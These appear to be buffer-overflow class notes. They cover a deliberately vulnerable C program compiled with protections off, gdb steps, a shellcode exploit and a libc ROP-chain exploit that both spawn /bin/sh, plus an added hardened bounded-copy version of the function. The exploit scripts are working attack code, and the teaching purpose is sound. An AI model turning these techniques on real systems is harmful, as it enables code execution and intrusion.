
Simplebof

These are the notes of the buffer overflow class.
Check Environment:
– uname -a
[Compilations]
+ With ASLR, stack protector and DEP turned off:
gcc -fno-stack-protector -z execstack bof.c -o bof
Having problems compiling bof.c?
bof.c: In function ‘print’:
bof.c:6:2: warning: incompatible implicit declaration of built-in function ‘strcpy’
strcpy(buf, str);
Resolved!
– vi bof.c
– Just add #include <string.h> at the top of the file
[Usage]:
./bof AAAA
./bof `python -c 'print "A" * 212 + "BBBB" + "C" * 100'`
./bof `python sploit.py`
./bof `python sploit2.py`
Start debugging using gdb. The author of this post debugged using gef:
– gdb -q bof | load the binary and read its symbols
– r `python sploit.py` | start the program with the output of sploit.py as its argument
– breakpoint: entry-break
bof.c script:
#include <stdio.h>
#include <string.h>

void print(char *str)
{
    char buf[200];
    strcpy(buf, str);      /* unbounded copy into a 200-byte stack buffer: the overflow under study */
    printf("%s\n", buf);   /* original omitted the buf argument */
}

int main(int argc, char *argv[])
{
    if (argc == 2) {
        print(argv[1]);
    }
    return 0;
}
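As an added example that is not part of the class notes or the author's repository, here is a bounded counterpart to print() that refuses any argument which would not fit in the same 200-byte buffer, so an over-long input can no longer reach the saved EBP/EIP. The file name safebof.c and the helper names print_bounded and try_run_of_a are assumptions.

```c
/* Constructed hardened counterpart to print() in bof.c.
 * Build it the opposite way from the class binary, e.g.
 *   gcc -fstack-protector-strong -z noexecstack -o safebof safebof.c
 * (the file name safebof.c is an assumption). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 200   /* same fixed buffer size as print() in bof.c */

/* Copies str into a 200-byte stack buffer only if it fits, terminator
 * included. Returns the length copied, or -1 when the input is rejected,
 * so the 212-byte padding from the class never overwrites the frame. */
int print_bounded(const char *str)
{
    char buf[BUF_SIZE];
    /* Look for the terminator inside the first BUF_SIZE bytes only. */
    const char *nul = memchr(str, '\0', BUF_SIZE);
    if (nul == NULL)
        return -1;                    /* no room for string + '\0' */

    size_t len = (size_t)(nul - str);
    memcpy(buf, str, len + 1);        /* bounded: len + 1 <= BUF_SIZE */
    printf("%s\n", buf);
    return (int)len;
}

/* Test helper (constructed): feeds a run of n 'A' bytes, mirroring the
 * class's input, and reports what print_bounded() decided. */
int try_run_of_a(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return -2;
    memset(s, 'A', n);
    s[n] = '\0';
    int rc = print_bounded(s);
    free(s);
    return rc;
}

int main(int argc, char *argv[])
{
    if (argc == 2 && print_bounded(argv[1]) < 0) {
        fprintf(stderr, "input too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    return 0;
}
```

Run it with the same 212-byte argument as the class binary and it exits with an error instead of crashing.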
sploit.py script (Python 2):
import struct

junk = "A" * 212                        # padding up to the saved return address
eip = struct.pack('<I', 0xb7efe1cd)     # return address, packed little-endian
shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
buf = junk + eip + shellcode
print buf
sploit2.py script (Python 2):
import struct

junk = "A" * 212
libc_base = 0xb7e16000
data_addr = 0x0804a024

shellcode = ""

# write "/bin//sh" to data_addr
shellcode += struct.pack('<I', libc_base + 0x000ef750)  # 0x000ef750 : pop ecx ; pop eax ; ret
shellcode += "/bin"
shellcode += struct.pack('<I', data_addr)
shellcode += struct.pack('<I', libc_base + 0x0002dc1f)  # 0x0002dc1f : mov dword ptr [eax], ecx ; ret
shellcode += struct.pack('<I', libc_base + 0x000ef750)  # 0x000ef750 : pop ecx ; pop eax ; ret
shellcode += "//sh"
shellcode += struct.pack('<I', data_addr + 4)
shellcode += struct.pack('<I', libc_base + 0x0002dc1f)  # 0x0002dc1f : mov dword ptr [eax], ecx ; ret

# write 0x00 to data_addr + 8
shellcode += struct.pack('<I', libc_base + 0x00001aa2)  # 0x00001aa2 : pop edx ; ret
shellcode += struct.pack('<I', data_addr + 8)
shellcode += struct.pack('<I', libc_base + 0x0002f06c)  # 0x0002f06c : xor eax, eax ; ret
shellcode += struct.pack('<I', libc_base + 0x000a6a2c)  # 0x000a6a2c : mov dword ptr [edx], eax ; ret

# write {"/bin//sh", NULL} to data_addr+12
shellcode += struct.pack('<I', libc_base + 0x000ef750)  # 0x000ef750 : pop ecx ; pop eax ; ret
shellcode += struct.pack('<I', data_addr)
shellcode += struct.pack('<I', data_addr + 12)
shellcode += struct.pack('<I', libc_base + 0x0002dc1f)  # 0x0002dc1f : mov dword ptr [eax], ecx ; ret

# write 0x00 to data + 16
shellcode += struct.pack('<I', libc_base + 0x00001aa2)  # 0x00001aa2 : pop edx ; ret
shellcode += struct.pack('<I', data_addr + 16)
shellcode += struct.pack('<I', libc_base + 0x0002f06c)  # 0x0002f06c : xor eax, eax ; ret
shellcode += struct.pack('<I', libc_base + 0x000a6a2c)  # 0x000a6a2c : mov dword ptr [edx], eax ; ret

# set ecx = address of {"/bin//sh", NULL}
shellcode += struct.pack('<I', libc_base + 0x000ef750)  # 0x000ef750 : pop ecx ; pop eax ; ret
shellcode += struct.pack('<I', data_addr + 12)
shellcode += "AAAA"

# put /bin//sh address into ebx
shellcode += struct.pack('<I', libc_base + 0x000198ce)  # 0x000198ce : pop ebx ; ret
shellcode += struct.pack('<I', data_addr)

# put 0xb into eax
shellcode += struct.pack('<I', libc_base + 0x0002f06c)  # 0x0002f06c : xor eax, eax ; ret
shellcode += struct.pack('<I', libc_base + 0x00145696)  # add eax, 0xb ; ret
shellcode += struct.pack('<I', libc_base + 0x0002e6a5)  # 0x0002e6a5 : int 0x80

shellcode = shellcode + "\x90" * (150 - len(shellcode))
buf = junk + shellcode
print buf
Or download the original scripts:
Download: simplebof.zip
Source: https://github.com/kurisuryu